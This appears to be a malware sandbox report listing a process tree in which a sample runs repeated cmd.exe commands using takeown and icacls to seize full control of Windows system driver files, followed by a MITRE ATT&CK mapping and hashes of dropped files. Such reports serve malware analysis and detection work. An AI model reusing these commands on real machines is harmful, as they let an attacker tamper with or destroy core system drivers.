C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit2⤵PID:4852
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\tunnel.sys3⤵
- Possible privilege escalation attempt
PID:4532
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\tunnel.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit2⤵PID:4420
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\UAGP35.SYS3⤵PID:4780
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\UAGP35.SYS /grant "Admin:F"3⤵
- Modifies file permissions
PID:4952
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit2⤵PID:4788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\udfs.sys3⤵PID:4372
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\udfs.sys /grant "Admin:F"3⤵PID:4848
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit2⤵PID:4208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS3⤵PID:4796
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "Admin:F"3⤵PID:4704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit2⤵PID:3692
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umbus.sys3⤵PID:4644
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\umbus.sys /grant "Admin:F"3⤵PID:4156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit2⤵PID:5108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\umpass.sys3⤵PID:5084
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\umpass.sys /grant "Admin:F"3⤵PID:4400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit2⤵PID:4568
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usb8023.sys3⤵PID:4396
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usb8023.sys /grant "Admin:F"3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit2⤵PID:4920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit2⤵PID:4508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\usbccgp.sys3⤵PID:4708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\usbccgp.sys /grant "Admin:F"3⤵PID:4268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit2⤵PID:4388
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit2⤵PID:5032
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-15846973461712601557-529740125-732785969-1667700266-81674815-1121871321524752586"1⤵PID:2376
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1322980431-814836915964818427-2580526661379417681-15968063131406110444693780309"1⤵PID:936
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "252843954-1879077758-151793596028145731094200740-1655206525-16646270221767643866"1⤵PID:1660
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "8010006-2044579352-1464846513-20580270121929209010-4080719561030415918-1893083238"1⤵PID:2044
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18564334061679283207909391374-12165582741651238255644799148974970801182860408"1⤵PID:2496
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-323640800-973719899-18812553811529788140289753776-1501774672-1526661386-1517611307"1⤵PID:2028
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1770790738-60405817-1028685813332885190-13541631511559824118-1076681523-309889630"1⤵PID:1956
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-18587980561741528591-61324300621246007201641440664-202234783213440506691869937771"1⤵PID:1760
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1850679302-533846196714438523527186842-2124694013339169329-2106235313129324479"1⤵PID:3284
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-755275184-2006632473-1243918976-1379193771771163633-1015272047-1889962606-1830607400"1⤵PID:3624
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "227736825-7870822081564888601-441661147-12230987481352599103-1971720821206299331"1⤵PID:3224
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "21215875593694845211777156370-1237226206-2070950032-504431601-1830909349-996044402"1⤵PID:3800
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-384864362-606224824-3912964372016084622675881957639771338795366991629253199"1⤵PID:3908
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "44026233-1549754338784677584313132751097856080-602851480-9299924211291409942"1⤵PID:3100
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1193327178-942182163455334125-494553685-806367459195117594118414068451680371758"1⤵PID:3816
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1660308626-1875573352-1033559878-437701969210546226179322505-117136074277177446"1⤵PID:3544
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-981818015-1222034354-1463972008-67318031466739695-656111969-11215819241906958306"1⤵PID:3876
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1862671194371434977-2120206022-172784936015295582741632355263-11846825492593749"1⤵PID:3460
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-11318067012073055681274744492-419508634201895378-2136383582-15340634481884572558"1⤵PID:3540
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-557501076-10879587871545190210-112601748436622941752244722-1549548255-480461644"1⤵PID:4032
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-2020702735-2080691252122132257616286077701511760891-14613942922085203382-1623683083"1⤵PID:1324
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1473744646-5691478601111141062-183716193117275519182130696375-17395593132072061109"1⤵PID:3496
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1708728541930068300-27198954-1272848664-1637036621544988536-4362021801148296027"1⤵PID:3432
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1524872386-706778866488820993755291648-314052673402354286-1209558540-1556752347"1⤵PID:4068
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1118229725-134699740715915690521395861370-1965682265-1588975475854478847-92853617"1⤵PID:3436
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1650112072-15131687611106864689-1241118422187658946912268954001380597422-4404699"1⤵PID:4540
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-8787596417949546971821932728-2144663817-971771978-1535994965-1391592761-1185894355"1⤵PID:4948
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2027462943524086451412123241135097958659741180494693356312358689871146835855"1⤵PID:4928
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "194733006711485621022138781831114764703314554150482048066342-7723077041606040289"1⤵PID:4456
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1749352038-151950950418680834791720620956-65640190-12099939701600641541186984275"1⤵PID:4488
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-12279837801505401489-589083874-117780271857560935-27789238532686526-959946831"1⤵PID:3704
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Winlogon Helper DLL
2Event Triggered Execution
1Change Default File Association
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\5Çæ▐čœ■ž¾š■ÿ▬ñ◘π87č◙▬ñœ9◙™☺2₧♠₧—↕ä♠øš™ß↑ו±↕▬ä3č◘■å╥╩╔¬®☻ž▄é■∩╧╥41○æń↑½9ñεž∞ö2↑¬3µï╔↑╬¾®½■ń¶▬2—√õ♀Ÿ¤
Filesize666B
MD59e1e5883c74742a497cf5c272ccd2321
SHA12cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b
-
Filesize
103KB
MD5373d53d7c6709d5106b29a26a71b0d31
SHA11708009c111266ba513503e06b94a5ccd402dee5
SHA256de3f42bc53000d3dad58f3182108c414ce8062095ef390314fcc628473490c86
SHA51215b32cd9b87a9852d6ad0f03321edb15468e136a220ff4473bc109355c9b401a4c4f7eeb99ad7097c67f9cfac7c416f84038c0639e4db59561d2dbc74ef5d67d